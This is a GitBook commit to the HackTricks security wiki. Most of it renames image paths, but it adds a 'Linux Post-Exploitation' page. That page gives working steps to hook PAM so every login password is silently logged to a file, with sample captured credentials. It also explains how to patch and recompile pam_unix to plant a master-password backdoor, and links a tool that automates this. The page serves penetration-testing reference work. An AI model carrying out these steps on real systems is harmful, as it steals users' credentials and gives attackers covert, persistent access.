GitBook: [#3285] No subject

This commit is contained in:
CPol 2022-06-27 08:48:17 +00:00 committed by gitbook-bot
parent 3faf014c03
commit bff25c8869
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
22 changed files with 145 additions and 9 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 8.1 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 8.1 KiB

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 264 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 264 KiB

After

Width:  |  Height:  |  Size: 868 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 868 KiB

After

Width:  |  Height:  |  Size: 237 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 17 KiB

After

Width:  |  Height:  |  Size: 88 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 88 KiB

After

Width:  |  Height:  |  Size: 3.6 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 3.6 KiB

After

Width:  |  Height:  |  Size: 28 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 50 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 50 KiB

After

Width:  |  Height:  |  Size: 72 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 19 KiB

View file

@ -79,7 +79,6 @@
* [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md) * [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md) * [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
* [PAM - Pluggable Authentication Modules](linux-hardening/privilege-escalation/pam-pluggable-authentication-modules.md)
* [SELinux](linux-hardening/privilege-escalation/selinux.md) * [SELinux](linux-hardening/privilege-escalation/selinux.md)
* [Logstash](linux-hardening/privilege-escalation/logstash.md) * [Logstash](linux-hardening/privilege-escalation/logstash.md)
* [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md) * [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)
@ -115,6 +114,8 @@
* [Bypass Linux Shell Restrictions](linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) * [Bypass Linux Shell Restrictions](linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
* [DDexec](linux-hardening/bypass-linux-shell-restrictions/ddexec.md) * [DDexec](linux-hardening/bypass-linux-shell-restrictions/ddexec.md)
* [Linux Environment Variables](linux-hardening/linux-environment-variables.md) * [Linux Environment Variables](linux-hardening/linux-environment-variables.md)
* [Linux Post-Exploitation](linux-hardening/linux-post-exploitation/README.md)
* [PAM - Pluggable Authentication Modules](linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)
## 🍏 MacOS Hardening ## 🍏 MacOS Hardening

View file

@ -305,7 +305,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to **
This is the **setting** in Github branch protections: This is the **setting** in Github branch protections:
![](<../.gitbook/assets/image (375) (1) (1).png>) ![](<../.gitbook/assets/image (375) (1) (1) (1).png>)
### Webhook Secret ### Webhook Secret

View file

@ -0,0 +1,135 @@
# Linux Post-Exploitation
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
## Sniffing Logon Passwords with PAM
Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
{% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}
First, we create a bash script that will be invoked whenever a new authentication occurs.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```
The variables are PAM specific and will become available via the `pam_exec.so` module.
Here is the meaning of the variables:
* **$PAM\_USER:** The username that was entered.
* **$PAM\_RHOST:** The remote host (typically the IP Address)
* **$(cat -):** This reads `stdin`, and will contain the password that the script grabs
* The results are piped into a log file at `/var/log/toomanysecrets.log`
To **prevent all users from reading** the file consider pre-creating it and running `chmod`, e.g.:
```bash
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
```
Next, the PAM configuration file needs to be updated the `pam_exec` module will be used to invoke the script.
There are various config files located in `/etc/pam.d/`, and we pick `common-auth`.
```
sudo nano /etc/pam.d/common-auth
```
On the very bottom of the file, add the following authentication module:
`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`
The options have the following meaning:
* **optional:** Authenticaiton shouldnt fail if there is an error (its not a required step)
* **pam\_exec.so:** This is the living off the land PAM module that can invoke arbitrary scripts
* **expose\_authtok:** This is the trick that allows to read the password via `stdin`
* **quiet:** Dont show any errors to the user (if something doesnt work)
* The last argument is the shell script that was created previously
![](<../../.gitbook/assets/image (375).png>)
Finally, make the file executable:
`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`
Now, lets try this out and ssh from another machine, or login locally.
And then look at the log file:
```
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
```
### Backdooring PAM
Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam\_unix\_auth.c file:
```
vi modules/pam_unix/pam_unix_auth.c
```
![](<../../.gitbook/assets/image (651).png>)
Lets change this by:
![](<../../.gitbook/assets/image (638).png>)
This will allow any user using the **password "0xMitsurugi"** to log in.
Recompile the `pam_unix_auth.c`, end replace the pam\_unix.so file:
```bash
make
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
/lib/x86_64-linux-gnu/security/
```
{% hint style="info" %}
You can automate this process with [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
{% endhint %}
## References
* [https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)
* [https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -199,7 +199,7 @@ The desktop application **overrides these listeners** to implement the desktop a
**Here is a simplified pseudocode:** **Here is a simplified pseudocode:**
![](<../../../.gitbook/assets/image (638) (2).png>) ![](<../../../.gitbook/assets/image (638) (2) (1).png>)
![](<../../../.gitbook/assets/image (620).png>) ![](<../../../.gitbook/assets/image (620).png>)

View file

@ -22,7 +22,7 @@ Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-o
This code open http(s) links with default browser: This code open http(s) links with default browser:
![](<../../../.gitbook/assets/image (375) (1).png>) ![](<../../../.gitbook/assets/image (375) (1) (1).png>)
Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it. Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.

View file

@ -333,7 +333,7 @@ You can have a service worker that will **flood the DNS cache to force a second
2. Service worker floods DNS cache (the cached attacker server name is deleted) 2. Service worker floods DNS cache (the cached attacker server name is deleted)
3. Second DNS request this time responded with 127.0.0.1 3. Second DNS request this time responded with 127.0.0.1
![](<../.gitbook/assets/image (375).png>) ![](<../.gitbook/assets/image (375) (1).png>)
_Blue is the first DNS request and orange is the flood._ _Blue is the first DNS request and orange is the flood._
@ -351,7 +351,7 @@ When the browser finds that the **domain isn't responding** to him, it will **us
Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\ Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0" Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
<img src="../.gitbook/assets/image (638) (2) (1).png" alt="" data-size="original"> <img src="../.gitbook/assets/image (638) (2) (1) (1).png" alt="" data-size="original">
{% endhint %} {% endhint %}
![](<../.gitbook/assets/image (620) (4).png>) ![](<../.gitbook/assets/image (620) (4).png>)

View file

@ -71,7 +71,7 @@ Follow this link for[ **more info about this vulnerability in Nginx**](../networ
Similar to previous technique, this one **instead** of creating a **HTTP2 tunnel** to an endpoint accessible via a proxy, it will create a **Websocket tunnel** for the same purpose, **bypass potential proxies limitations** and talk directly to the endpoint: Similar to previous technique, this one **instead** of creating a **HTTP2 tunnel** to an endpoint accessible via a proxy, it will create a **Websocket tunnel** for the same purpose, **bypass potential proxies limitations** and talk directly to the endpoint:
![](<../.gitbook/assets/image (651) (2).png>) ![](<../.gitbook/assets/image (651) (2) (1).png>)
### Scenario 1 ### Scenario 1

View file

@ -152,7 +152,7 @@ Several web pages have endpoints that **accept as parameter the name of the func
A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like: A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
![](<../../.gitbook/assets/image (651).png>) ![](<../../.gitbook/assets/image (651) (2).png>)
In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**). In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).

View file

@ -28,7 +28,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
If this function is used, you can find which **algorithm is being used** checking the value of the second parameter: If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
![](<../../.gitbook/assets/image (375) (1) (1) (1).png>) ![](<../../.gitbook/assets/image (375) (1) (1) (1) (1).png>)
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id) Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)